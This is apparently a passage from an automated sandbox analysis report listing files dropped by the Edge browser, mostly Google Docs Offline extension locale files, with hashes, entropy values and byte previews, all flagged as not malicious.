                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                        C:\Users\user\AppData\Local\Temp\abd3b990-0f55-46a5-9bca-7965319d608d.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:XML 1.0 document, ASCII text, with very long lines (813), with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):870
                                                        Entropy (8bit):5.45820651265885
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:703CA8DAE30054D1FE2C2BEBC2C93BC2
                                                        SHA1:96097765C9A8F701477BD5A5A1EDE006FAA8E640
                                                        SHA-256:7FD08803431AA840028442D55F2E1AF2FBED7A5B403D93ED5E49BE27EB763894
                                                        SHA-512:7748E03ADA60C1FEFFEE6C434CE1414AAF5FBD5E4052ED492DFA2760AA17590C30C402630B2F50704735D3023AA540758E186E126659F0A8F6C69F85ECD3EA78
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="2" name="_VPID_ALTERNATENAMES"><vt:lpwstr></vt:lpwstr></property><property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="IsMetric"><vt:bool>false</vt:bool></property><property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="BuildNumberCreated"><vt:i4>0</vt:i4></property><property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="BuildNumberEdited"><vt:i4>1075463865</vt:i4></property><property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="TimeEdited"><vt:filetime>2024-10-28T05:41:57Z</vt:filetime></property></Properties>

                                                        C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1658
                                                        Entropy (8bit):5.381331936085411
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:963E6B2C7037DFA5BC2CBAD924CE448C
                                                        SHA1:BAF03B89EED510CF7018B34DADE7241C5AC18F1F
                                                        SHA-256:591B5C853B3E80588336BDBAB7112074CDBE64BF58BA3EC7A6A4AAE8044AD986
                                                        SHA-512:6C5451C15DCC93CFF0B02A05957641F572595849D6CF75378E9073F14CE3C9A41F5B3F69E950239455CFEF100C0176D6D5C168DB8E1D9DA492C9BAB0E0810E18
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"logTime": "1006/094402", "correlationVector":"8WI8p7zmTYZPBE2VuaIHdV","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/094402", "correlationVector":"BE656E2071D443B2A044B6460819F865","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/094402", "correlationVector":"ofm+cIrSMXiKDSEfAz53+L","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100217", "correlationVector":"BAAKQ8ziDwmR+5pa4ka4fJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100217", "correlationVector":"26B927C0336B4CA88B073123F1EBD565","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/100344", "correlationVector":"0X4rigFMuRDtJh2eBJUoom","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100344", "correlationVector":"7D72384D1A7E431FAD88F4EA6E3461C6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1006/100656", "correlationVector":"lbOwU396NAlX9/dcZ65n2d","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1006/100657", "correlationVector":"D051616C

                                                        C:\Users\user\AppData\Local\Temp\db459823-ec02-4ee6-b3c8-c00c726cd3cf.tmp

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                        Category:dropped
                                                        Size (bytes):31335
                                                        Entropy (8bit):7.694019108205432
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:6B72597205C77D3E40E1A35BEE403801
                                                        SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                        SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                        SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\128.png

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):4982
                                                        Entropy (8bit):7.929761711048726
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\af\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):908
                                                        Entropy (8bit):4.512512697156616
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\am\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1285
                                                        Entropy (8bit):4.702209356847184
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ar\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1244
                                                        Entropy (8bit):4.5533961615623735
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\az\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):977
                                                        Entropy (8bit):4.867640976960053
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\be\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3107
                                                        Entropy (8bit):3.535189746470889
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\bg\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1389
                                                        Entropy (8bit):4.561317517930672
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\bn\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1763
                                                        Entropy (8bit):4.25392954144533
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ca\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):930
                                                        Entropy (8bit):4.569672473374877
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\cs\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):913
                                                        Entropy (8bit):4.947221919047
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\cy\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):806
                                                        Entropy (8bit):4.815663786215102
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\da\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):883
                                                        Entropy (8bit):4.5096240460083905
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\de\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1031
                                                        Entropy (8bit):4.621865814402898
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\el\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1613
                                                        Entropy (8bit):4.618182455684241
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\en_CA\messages.json

                                                        Download File
